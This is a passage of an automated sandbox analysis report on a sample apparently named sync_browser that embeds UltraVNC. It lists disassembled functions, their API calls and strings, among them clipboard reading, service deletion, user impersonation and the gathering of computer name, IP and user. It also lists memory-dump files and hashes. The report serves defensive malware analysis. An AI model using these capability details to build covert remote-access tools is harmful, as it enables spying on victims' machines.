Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0A6
Part of subcall function 00007FF74000A040: MessageBoxA.USER32 ref: 00007FF74000A0B7
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0C2
Part of subcall function 00007FF74000A040: CloseDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0CB

Strings

uvnc_service, xrefs: 00007FF740012E98
UltraVNC, xrefs: 00007FF740012E6F, 00007FF740012ECA, 00007FF740012EF9, 00007FF740012F81
Failed to open the service, xrefs: 00007FF740012F00
Failed to query service status, xrefs: 00007FF740012F37
Failed: Permission denied, xrefs: 00007FF740012ED1
Failed to open service control manager, xrefs: 00007FF740012E76
Failed to delete the service, xrefs: 00007FF740012F7A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
API String ID: 1921882253-4018834470
Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
Instruction ID: 868a9983b38ccdd812511e0c57e0005df7036e303c76254e171375bd2e091816
Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
Instruction Fuzzy Hash: 94412835A0CA47C2FA14BB11A8146B8A3A1BF59B44FC40039D91E4A7BDEE3DF5968770

Function 00007FF740001AE0 Relevance: 36.2, APIs: 24, Instructions: 196clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF740001B0B
IsClipboardFormatAvailable.USER32 ref: 00007FF740001B67
GetClipboardData.USER32 ref: 00007FF740001B79
GlobalLock.KERNEL32 ref: 00007FF740001B8E
GlobalSize.KERNEL32 ref: 00007FF740001B9A
WideCharToMultiByte.KERNEL32 ref: 00007FF740001BD3
WideCharToMultiByte.KERNEL32 ref: 00007FF740001C0D
GlobalUnlock.KERNEL32 ref: 00007FF740001C38
IsClipboardFormatAvailable.USER32 ref: 00007FF740001C48
GetClipboardData.USER32 ref: 00007FF740001C58
GlobalLock.KERNEL32 ref: 00007FF740001C69
GlobalSize.KERNEL32 ref: 00007FF740001C75
GlobalUnlock.KERNEL32 ref: 00007FF740001CAA

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
String ID:
API String ID: 1939172783-0
Opcode ID: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
Instruction ID: 345f86f77d6db0725d3695746b4202d1ce5d693792f9913fdcfd03c6f1a444c4
Opcode Fuzzy Hash: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
Instruction Fuzzy Hash: 91813B21A1DB42D6E654BF26B9506B9B3A0FF84B80B844138DE5E477A9DF3CF424C720

Function 00007FF74002C2C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF74002C326
LeaveCriticalSection.KERNEL32 ref: 00007FF74002C33B
LeaveCriticalSection.KERNEL32 ref: 00007FF74002C356

Strings

vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF74002C43D
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF74002C3DC
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF74002C2F4
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF74002C37E
g, xrefs: 00007FF74002C31B
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF74002C3A7
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF74002C455

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
API String ID: 2978645861-1267036565
Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
Instruction ID: 486867ef2c542e2816abc1f027d033ef4ef148c39fac9a4547c0dc05dab27ed0
Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
Instruction Fuzzy Hash: 48517F25A2CA82C4F654BB21A8146FAA3A1FF89790FC40036D95E463B9CF3CF905C770

Function 00007FF740028A70 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

CreateRectRgn.GDI32 ref: 00007FF740028BF6
CreateRectRgn.GDI32 ref: 00007FF740028C73
SetRectRgn.GDI32 ref: 00007FF740028C91
CombineRgn.GDI32 ref: 00007FF740028CA8
DeleteObject.GDI32 ref: 00007FF740028CB1
EnterCriticalSection.KERNEL32 ref: 00007FF740028D26
CombineRgn.GDI32 ref: 00007FF740028D42
SetEvent.KERNEL32 ref: 00007FF740028D73
SetEvent.KERNEL32 ref: 00007FF740028DA5
LeaveCriticalSection.KERNEL32 ref: 00007FF740028DB7
DeleteObject.GDI32 ref: 00007FF740028DC3
free.LIBCMT ref: 00007FF740028CBA

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

GetRgnBox.GDI32 ref: 00007FF740028CCC
DeleteObject.GDI32 ref: 00007FF740028CF2
free.LIBCMT ref: 00007FF740028CFD
free.LIBCMT ref: 00007FF740028DCE

Strings

vncclient.cpp : FATAL! client update region is empty!, xrefs: 00007FF740028CD7
\, xrefs: 00007FF740028D1B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
String ID: \$vncclient.cpp : FATAL! client update region is empty!
API String ID: 1264956880-3227535004
Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
Instruction ID: 52fc5cfc38e7189009eb68a082b2af6058336f7d82ca03de4ca5959764abd8d4
Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
Instruction Fuzzy Hash: DCA1E532618696CAD744EF16E844A7EB7A8FB89B80F415036EE5E43764CF3DE805CB10

Function 00007FF740007A1C Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
, (MSIL Processor), xrefs: 00007FF740007A2B
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
API String ID: 171970310-1756215141
Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
Instruction ID: b48e91992d6bf3004cd930e39ee66bf459233f0df950afb8ee01cc209dced2fe
Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
Instruction Fuzzy Hash: 6AB18521A1C6C6C5E760AB35A8016B977A0FB057B0F804336EA7D47BE9DE2CF545C720

Function 00007FF740007A5B Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

, (MIPS Processor), xrefs: 00007FF740007A6A
Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
API String ID: 171970310-18614430
Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
Instruction ID: 5439dc73e6525bfef756f3b5a7363f198e2c68d4118f9689d7e158f9357f97ae
Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
Instruction Fuzzy Hash: 82B18521A1C6C6C5E760AB35A8016B977A0FB057B4F804336EA7D47BE9DE2CF545C320

Function 00007FF740007B37 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
, (Alpha64 Processor), xrefs: 00007FF740007B46
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
API String ID: 171970310-1760265636
Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
Instruction ID: f972114e35b0c8f05dbaae06b6775d697849e94b0ef90450c7225871fc3c666a
Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
Instruction Fuzzy Hash: 4FB17421A1C586C5E760AB35A8016B977A0FB047B4F804336EA7D87BE9DF2CF545C720

Function 00007FF740007BA6 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
, (IA64 Processor), xrefs: 00007FF740007BB5
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
API String ID: 171970310-1812746349
Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
Instruction ID: 3ecd22c13ea79b3c952f81ec3a3d6053169489cc252c4260cac4b94761e8ea5a
Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
Instruction Fuzzy Hash: 54B18521A1C6C6C5E760AB35A8016B977A0FB057B4F804336EA7D47BE9DE2CF545C320

Function 00007FF7400079E9 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
%02d, xrefs: 00007FF740007CB3
, (Intel Processor), xrefs: 00007FF7400079F8
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
API String ID: 171970310-3029765189
Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
Instruction ID: cb9a5926790d37adc984f5a8b3ddabe68379e2f71aaf4b1c19eba3aec5e32c7a
Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
Instruction Fuzzy Hash: 27B18521A1C586C5EB60EB35A4016B977A0FB057B0F804336E67E47BE9DE2CF505C320

Function 00007FF740007A9A Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
, (ARM Processor), xrefs: 00007FF740007AA9
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
API String ID: 171970310-978419383
Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
Instruction ID: 60e0691cfa3251dc13c1a61929309a64b778706be35d364e60601a46fe80f080
Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
